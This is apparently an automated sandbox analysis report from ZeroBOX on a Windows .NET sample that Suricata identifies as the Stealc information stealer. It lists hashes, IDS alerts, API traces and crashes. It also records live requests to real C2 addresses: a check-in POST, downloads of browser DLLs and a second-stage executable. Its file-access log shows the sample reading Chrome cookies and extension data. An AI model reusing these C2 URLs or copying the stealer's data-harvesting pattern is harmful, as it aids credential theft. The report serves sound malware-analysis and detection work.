popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

66ded92c118ad_svvfdd.exe#space

Client SW User Data Stealer info stealer ftp Client Antivirus PWS Http API AntiDebug PE32 PE File .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 10, 2024, 10:20 a.m. Sept. 10, 2024, 10:25 a.m.
Size 216.4KB
Type PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 69f26c9e7dfc93644c1c9ebaeff84128
SHA256 e80e120da34729c9fb7e7d4a684a7260f1346696ee8b3b514b6e512ebfa1bea4
CRC32 9E0CFF94
ssdeep 6144:SRVDJEiSbWAUzJYyFhMNFM0ncnWIIHMEO:MJSbWAUzJHFqrM0nMWIpEO
PDB Path c:\4a39bj1qnm7h\obj\Release\' .pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Antivirus - Contains references to security software
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.104 Active Moloch
46.8.231.109 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2044243 ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2044244 ET MALWARE Win32/Stealc Requesting browsers Config from C2 Malware Command and Control Activity Detected
TCP 46.8.231.109:80 -> 192.168.56.101:49163 2051828 ET MALWARE Win32/Stealc Active C2 Responding with browsers Config M1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2044246 ET MALWARE Win32/Stealc Requesting plugins Config from C2 Malware Command and Control Activity Detected
TCP 46.8.231.109:80 -> 192.168.56.101:49163 2051831 ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2044248 ET MALWARE Win32/Stealc Submitting System Information to C2 Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 46.8.231.109:80 2044301 ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 46.8.231.109:80 -> 192.168.56.101:49163 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 46.8.231.109:80 -> 192.168.56.101:49163 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.101:49167 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.101:49167 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2044303 ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 46.8.231.109:80 -> 192.168.56.101:49165 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 46.8.231.109:80 -> 192.168.56.101:49165 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2044302 ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 46.8.231.109:80 -> 192.168.56.101:49165 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2044305 ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2044306 ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 46.8.231.109:80 2044307 ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity A suspicious filename was detected
TCP 147.45.44.104:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.101:49167 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.101:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
pdb_path c:\4a39bj1qnm7h\obj\Release\' .pdb
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RtlDeleteTimerQueueEx+0x5db RtlCutoverTimeToSystemTime-0xaf ntdll+0x74801 @ 0x76f84801
LdrVerifyImageMatchesChecksum+0x326 RtlComputePrivatizedDllName_U-0xf12 ntdll+0xa08f5 @ 0x76fb08f5
RtlDeleteTimerQueueEx+0x378 RtlCutoverTimeToSystemTime-0x312 ntdll+0x7459e @ 0x76f8459e
RtlDeleteTimerQueueEx+0x2bb RtlCutoverTimeToSystemTime-0x3cf ntdll+0x744e1 @ 0x76f844e1
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x76f4c389
RtlFlsAlloc+0x993 EtwNotificationRegister-0x13c ntdll+0x3f3f6 @ 0x76f4f3f6
RtlEncodeSystemPointer+0x33d RtlFindClearBits-0x454 ntdll+0x3e395 @ 0x76f4e395
RtlSetBits+0x115 RtlFlsAlloc-0x5e ntdll+0x3ea05 @ 0x76f4ea05
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x76f4d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x76f4c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x72c4d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x75981d2a
LoadLibraryExA+0x26 FreeLibrary-0x18 kernelbase+0x11d7a @ 0x75981d7a
LoadLibraryA+0x31 HeapCreate-0x25 kernel32+0x14a08 @ 0x755c4a08
regasm+0xa09c @ 0x40a09c
regasm+0xff93 @ 0x40ff93
regasm+0x1086d @ 0x41086d
regasm+0x15a40 @ 0x415a40
regasm+0x165b6 @ 0x4165b6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 50 04 29 55 fc 8b 08 03 4d 08 57 56 83 c0 08
exception.symbol: RtlDeleteTimerQueueEx+0x644 RtlCutoverTimeToSystemTime-0x46 ntdll+0x7486a
exception.instruction: mov edx, dword ptr [eax + 4]
exception.module: ntdll.dll
exception.exception_code: 0xc0000006
exception.offset: 477290
exception.address: 0x76f8486a
registers.esp: 4033668
registers.edi: 0
registers.eax: 448487424
registers.ebp: 4033692
registers.edx: 448487424
registers.ebx: 268435456
registers.esi: 179175424
registers.ecx: 22624
1 0 0

__exception__

 stacktrace: 
FindFirstUrlCacheEntryA+0x920a InternetGetCertByURL-0x3428 wininet+0x2a63b @ 0x75d6a63b
FindFirstUrlCacheEntryA+0x9703 InternetGetCertByURL-0x2f2f wininet+0x2ab34 @ 0x75d6ab34
FindFirstUrlCacheEntryA+0x94c7 InternetGetCertByURL-0x316b wininet+0x2a8f8 @ 0x75d6a8f8
GetUrlCacheHeaderData+0x77b1 IsHostInProxyBypassList-0xd56 wininet+0x1c323 @ 0x75d5c323
GetUrlCacheHeaderData+0x7c38 IsHostInProxyBypassList-0x8cf wininet+0x1c7aa @ 0x75d5c7aa
IsUrlCacheEntryExpiredW+0x1a5 FindFirstUrlCacheContainerW-0x3f5 wininet+0x3dba0 @ 0x75d7dba0
InternetCloseHandle+0x3c9 HttpQueryInfoA-0x170d wininet+0xca2d @ 0x75d4ca2d
InternetSetOptionA+0x2ba1 InternetCloseHandle-0x2e4 wininet+0xc380 @ 0x75d4c380
InternetSetOptionA+0x2423 InternetCloseHandle-0xa62 wininet+0xbc02 @ 0x75d4bc02
InternetCloseHandle+0xfa HttpQueryInfoA-0x19dc wininet+0xc75e @ 0x75d4c75e
InternetCloseHandle+0x2a HttpQueryInfoA-0x1aac wininet+0xc68e @ 0x75d4c68e
New_wininet_InternetCloseHandle@4+0x67 New_wininet_InternetConnectA@32-0x63 @ 0x72c5959f
regasm+0x62a9 @ 0x4062a9
regasm+0x12c6a @ 0x412c6a
regasm+0x131bd @ 0x4131bd
regasm+0x15dcb @ 0x415dcb
regasm+0x165b6 @ 0x4165b6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 89 14 86 8b 51 04 0f af 55 10 40 c1 ea 02 3b c2
exception.symbol: FindFirstUrlCacheEntryA+0x926d InternetGetCertByURL-0x33c5 wininet+0x2a69e
exception.instruction: mov dword ptr [esi + eax*4], edx
exception.module: WININET.dll
exception.exception_code: 0xc0000006
exception.offset: 173726
exception.address: 0x75d6a69e
registers.esp: 4035372
registers.edi: 3
registers.eax: 0
registers.ebp: 4035376
registers.edx: 3735928559
registers.ebx: 11150392
registers.esi: 8894336
registers.ecx: 11150392
1 0 0

__exception__

 stacktrace: 
RetrieveUrlCacheEntryFileA+0x20567 InternetAutodialCallback-0x452a wininet+0x86081 @ 0x75dc6081
FindFirstUrlCacheEntryA+0x9703 InternetGetCertByURL-0x2f2f wininet+0x2ab34 @ 0x75d6ab34
FindFirstUrlCacheEntryA+0x94c7 InternetGetCertByURL-0x316b wininet+0x2a8f8 @ 0x75d6a8f8
GetUrlCacheHeaderData+0x77b1 IsHostInProxyBypassList-0xd56 wininet+0x1c323 @ 0x75d5c323
GetUrlCacheHeaderData+0x7c38 IsHostInProxyBypassList-0x8cf wininet+0x1c7aa @ 0x75d5c7aa
IsUrlCacheEntryExpiredW+0x1a5 FindFirstUrlCacheContainerW-0x3f5 wininet+0x3dba0 @ 0x75d7dba0
InternetCloseHandle+0x3c9 HttpQueryInfoA-0x170d wininet+0xca2d @ 0x75d4ca2d
InternetSetOptionA+0x2ba1 InternetCloseHandle-0x2e4 wininet+0xc380 @ 0x75d4c380
InternetSetOptionA+0x2423 InternetCloseHandle-0xa62 wininet+0xbc02 @ 0x75d4bc02
InternetCloseHandle+0xfa HttpQueryInfoA-0x19dc wininet+0xc75e @ 0x75d4c75e
InternetCloseHandle+0x2a HttpQueryInfoA-0x1aac wininet+0xc68e @ 0x75d4c68e
New_wininet_InternetCloseHandle@4+0x67 New_wininet_InternetConnectA@32-0x63 @ 0x72c5959f
regasm+0x62a9 @ 0x4062a9
regasm+0x12c6a @ 0x412c6a
regasm+0x131bd @ 0x4131bd
regasm+0x15dcb @ 0x415dcb
regasm+0x165b6 @ 0x4165b6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 56 04 89 55 d4 81 fa ff 01 00 00 0f 87 d9 3f
exception.symbol: FindFirstUrlCacheEntryA+0x9b8e InternetGetCertByURL-0x2aa4 wininet+0x2afbf
exception.instruction: mov edx, dword ptr [esi + 4]
exception.module: WININET.dll
exception.exception_code: 0xc0000006
exception.offset: 176063
exception.address: 0x75d6afbf
registers.esp: 4035304
registers.edi: 0
registers.eax: 2799
registers.ebp: 4035380
registers.edx: 0
registers.ebx: 8519680
registers.esi: 8894336
registers.ecx: 2799
1 0 0

__exception__

 stacktrace: 
cs_strdup+0x670 decodeInstruction-0x969 @ 0x72c664da
decodeInstruction+0x6d SHA1Reset-0xe54 @ 0x72c66eb0
X86_getInstruction+0x104 printSrcIdx8-0x2874 @ 0x72c61495
cs_disasm_ex+0x168 cs_free-0x55d @ 0x72c60571
disasm+0x68 hook_create_stub-0x8e @ 0x72c34028
log_exception+0x2bd log_action-0x360 @ 0x72c3355f
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x72c5480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143
regasm+0x131bd @ 0x4131bd
regasm+0x15dcb @ 0x415dcb
regasm+0x165b6 @ 0x4165b6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8a 14 02 8b 45 0c 88 10 31 c0 eb 03 83 c8 ff 83
exception.symbol: MCOperand_CreateImm0+0x6e X86_getInstruction-0x52
exception.instruction: mov dl, byte ptr [edx + eax]
exception.module: monitor-x86.dll
exception.exception_code: 0xc0000006
exception.offset: 201535
exception.address: 0x72c6133f
registers.esp: 4030960
registers.edi: 0
registers.eax: 0
registers.ebp: 4030984
registers.edx: 1957064669
registers.ebx: 0
registers.esi: 1957064669
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://46.8.231.109/c4754d4f680ead72.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.104/prog/66df167d4ce6b_v.exe
request GET http://46.8.231.109/
request POST http://46.8.231.109/c4754d4f680ead72.php
request GET http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
request GET http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
request GET http://147.45.44.104/prog/66df167d4ce6b_v.exe
request POST http://46.8.231.109/c4754d4f680ead72.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00390000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00410000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 1179648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00960000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00465000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00467000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0040c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x764b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75831000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e0000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73751000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74181000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 995328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x61e00000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\te\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\fil\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\am\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fr\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\fr\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\_locales\nb\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Current Tabs\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_close.png\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
